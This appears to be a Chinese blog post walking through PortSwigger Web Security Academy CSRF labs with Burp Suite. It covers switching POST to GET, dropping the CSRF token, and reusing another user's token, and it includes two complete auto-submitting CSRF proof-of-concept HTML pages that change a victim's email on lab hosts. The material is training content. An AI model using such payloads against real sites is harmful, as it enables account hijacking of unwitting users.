CSRFburpsuite靶场实验

已于 2024-03-24 14:03:10 修改
阅读量1.4k 收藏 26
点赞数 37
文章标签: 安全 网络
于 2024-03-24 13:37:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64787896/article/details/136986442
版权
文章描述了在WebSecurityAcademy的实验中,如何利用POST到GET的请求修改,绕过CSRF防御,通过构造CSRFpayload实现电子邮件地址的更改。实验还探讨了CSRF字段的必要性以及不同用户令牌的应用。
摘要由CSDN通过智能技术生成

实验二:修改提交方式(POST->GET)

此实验室的电子邮件更改功能容易受到 CSRF 的攻击。它试图阻止 CSRF 攻击,但仅对某些类型的请求应用防御。

要解决该实验,请使用漏洞利用服务器托管一个 HTML 页面,该页面使用 CSRF 攻击来更改查看者的电子邮件地址。

您可以使用以下凭据登录自己的帐户:wiener:peter

第一步:开启burp suite代理拦截,设置Email并提交

第二步:修改POST提交为GET提交

第三步:删掉GET提交url后面的csrf字段

第四步:构造CSRFpayload

payload如下:

<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0a2400b9042487338172c550001900b6.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="187722854@qq.com" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

第五步:提交生成的payload,修改设置的Email,实验成功

实验三:测试CSRF字段是否必须要

第一步:同上,提交绑定Email请求,开启burp suite代理拦截

第二步:删除报文的csrf字段

第三步:生成csrfpayload

第四步:提交修改的payload,实验成功

实验四:使用其他用户的csrf令牌,该实验证明csrf的token和用户没有联系

第一步:使用wiener:peter提交设置Email请求,并抓包拦截

&csrf=gL9PjNtfW0nxm4vlZ8X6QKXeczZzPRkB

第二步:复制该csrf令牌,修改carlos:montoya用户登陆,提交设置Email请求,抓包拦截

第三步:将第一个csrf令牌替换第二个报文的csrf令牌

&csrf=PXIMih38mFm3ZyMhZKpAcFqpgNDtlrXH

第四步:生成payload提交,实验成功

<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0acf009e04735a5a86cb5df400950061.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="283920639@qq.com" /> <input type="hidden" name="csrf" value="gL9PjNtfW0nxm4vlZ8X6QKXeczZzPRkB" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

eternality269
关注
  • 37
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用burp suite进行CSRF重放攻击
vaeloverforever的博客
12-16 4205
在windows xp系统中配置Damn Vulnerable Web Application (DVWA),借此安装一个web服务器,这个应用程序有若干基于web的漏洞,比如跨站脚本 (XSS), SQL注入, CSRF,命令注入等。 安装步骤 Step 1: 下载并安装XAMPP Step 2: 打开XAMPP Control Panel,开启Apache和MySQL服务 点击”S...
pikachu靶场实验操作
G6_12的博客
06-11 1169
Pikachu
burp靶场--CSRF
qq_33168924的博客
01-25 1683
应用程序不校验csrf的有效性,只是对比body中与cookie中csrf的值是否相同,相同就接受请求,由于搜索功能没有csrf保护,并且存在cookie注入,所以可以使用搜索中cookie注入修改cookie的csrf与bodycsrf一致造成csrf攻击。步骤1:登陆两个账户,将账户A的csrfkey与csrf值替换给第二个账户B中使用,用来请求修改邮箱地址,修改成功,但是由于cookie被修改会导致账户退出,并且发现搜索功能存在cookie注入【注入的数据可以修改客户端cookie设置】,所以结合。
burp 官方靶场全程操作笔记 第一章节
2301_78362619的博客
01-25 1440
burp官方实验室 笔记
【2024版】最新BurpSuit的使用教程(非常详细)零基础入门到精通,看一篇就够了!让你挖洞事半功倍!
热门推荐
Javachichi的博客
01-25 1万+
下载地址:https://github.com/c0ny1/chunked-coding-converterShiro被动检测地址:https://github.com/pmiaowu/BurpShiroPassiveScan**fastjson被动检测**地址: https://github.com/uknowsec/BurpSuite-Extender-fastjson。
burpsuite安全练兵场-客户端12】跨站点请求伪造CSRF-12个实验(全)
wangluoanquan111的博客
03-19 1871
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-
CSRF漏洞的靶场实验
09-19
在“CSRF漏洞的靶场实验”中,我们将通过实际操作来理解这种攻击方式以及如何防御。 首先,我们需要了解CSRF攻击的基本原理。当用户访问一个网站并登录后,浏览器会保存一个叫做会话(Session)的状态,使得用户在...
OWASP Mutillidae II 漏洞靶场实验指导书.pdf
11-20
OWASP Mutillidae II 漏洞靶场实验指导书汇总 OWASP Top 10 应用安全风险-2017 OWASP (Open Web Application Security Project)开放式 Web 应用程序 安全项目,是一个组织,它提供有关计算机和互联网应用程序的...
网络靶场体系结构与关键技术---鹏程实验室国家级网络靶场.pdf
08-08
网络靶场是一种用于网络安全研究、测试、教学和训练的模拟环境,它模拟了真实的网络系统和网络攻击场景,使研究人员可以在控制和隔离的环境下进行安全实验和攻防演练,而不影响真实的网络和系统。网络靶场网络安全...
网络攻防课程靶场实验报告
最新发布
05-14
所使用的靶场是红日靶场
burp靶场--WebSockets安全漏洞
qq_33168924的博客
01-24 1615
Burp代理的HTTP历史记录选项卡中,找到WebSocket握手请求。观察请求是否没有CSRF令牌。凭据:carlos: fj83hbdbohtky68riu8b。右键单击握手请求并选择"复制URL"
使用burp suite验证是否存在csrf漏洞
越努力 越自由
03-17 6657
burp suite中集成了验证csrf漏洞的poc,直接使用就可以,不用自己构建表单了,非常方便。用pikachu的csrf来进行验证吧。 CSRF(get) 提交修改个人信息后,截取数据包,选择如下 如下,我们将原本的手机111...修改为2222,复制burp构造的表单链接,在同一个浏览器打开(没有退出登录的前提下) 点击 数据被修改成功,存在csrf CSRF(POST) 也是一样的方式,就不再演示,如果数据被修改成功,则存在漏洞 CSRF(Token) 由于携带了
Burp Suite使用介绍(二)
muier的专栏
03-31 4304
Burp Suite使用介绍(二) Repeater Burp Repeater(中继器)是用于手动操作和补发个别HTTP请求,并分析应用程序的响应一个简单的工具。您可以发送一个内部请求从Burp任何地方到Repeater(中继器),修改请求并且发送它。 Using Burp Repeater 您可以使用中继器用于各种目的,如改变参数值来测试输入为基础的漏洞,发
CRLF注入详解 (HTTP响应头拆分)学习笔记(一)
wei.zhou的专栏
08-10 4873
一:前言 “HTTP响应头拆分漏洞”是一种新型的web攻击方案,它重新产生了很多安全漏洞包括:web缓存感染、用户信息涂改、窃取敏感用户页面、跨站脚本漏洞。这项攻击方案,包括其衍生的一系列技术产生,是由于web应用程序没有对用户的提交进行严格过滤,导致非法用户可以提交一些恶意字符,更具体来说,是对用户输入的CR 和LF字符没有进行严格的过滤。 “HTTP响应头拆分漏洞”及其相关的攻击手段可以在
HTTP响应头拆分攻击(又名曰CRLF注入)
SoulCat
06-11 4385
HTTP响应头拆分攻击(又名曰CRLF注入) 最虐不过等不到南康白起35岁,吴邪等不到张起灵。 漏洞概述: CRLF注入攻击是比较新颖的一种Web攻击方式,如Web缓存感染、用户信息涂改、窃取敏感用户页面、跨站脚本漏洞等。主要是由于Web应用程序未对用户提交的数据进行严格过滤和检查,导致攻击者可以提交一些恶意字符如(CR、LF等)然后进行构造恶意代码进行攻击。 基本原理: CR:对应A...
CRLF
jji8877032的专栏
04-05 1806
CRLF:Carriage Retun Line Feed CRLF:回车换行   回车:回到当前行的最左边; 换行:另起一行
CRLF注入漏洞
Jim的博客
08-21 1万+
CRLF是“回车+换行”(\r\n)的简称,其十六进制编码分别为0x0d和0x0a。在HTTP协议中,HTTP header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP内容并显示出来。所以,一旦我们能够控制HTTP消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话Cookie或者HTML代码。 1.通过CRLF注入构造会话固定漏洞 请求参数:
burpsuite生成POC验证CSRF过程及原理
qq_41123867的博客
02-19 1万+
一.CSRF漏洞成因: 浏览器访问web服务器A,登录状态下,再用同一个浏览器访问了恶意服务器B,服务器B返回给浏览器的页面中含有要求访问服务器A的恶意代码,用户不知情的情况下点击后,导致服务器A接收到来自服务器B的通过浏览器发起的恶意请求 根据上图可知,要验证CSRF,需要在访问网站A后获得cookie后,再访问一个会返回恶意代码的网站B,返回的恶意代码必须能导致访问网站A ,如果能通过返回的...
BurpSuite自动生成CSRF PoC
weixin_30394669的博客
05-30 540
今天才发现BurpSuite有这么强大的功能: 转载于:https://www.cnblogs.com/phoenix--/archive/2013/05/30/3107606.html
SQLi靶场实验:Less2挑战与数据库信息获取
在本次sqli靶场实验一(less2)中,我们深入探讨了SQL注入漏洞的利用技巧。实验主要集中在MySQL环境中的四个关键任务上,展示了针对不同场景的攻击手段和结果分析。 1. 数字型SQL注入检测: 实验开始时,通过观察...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值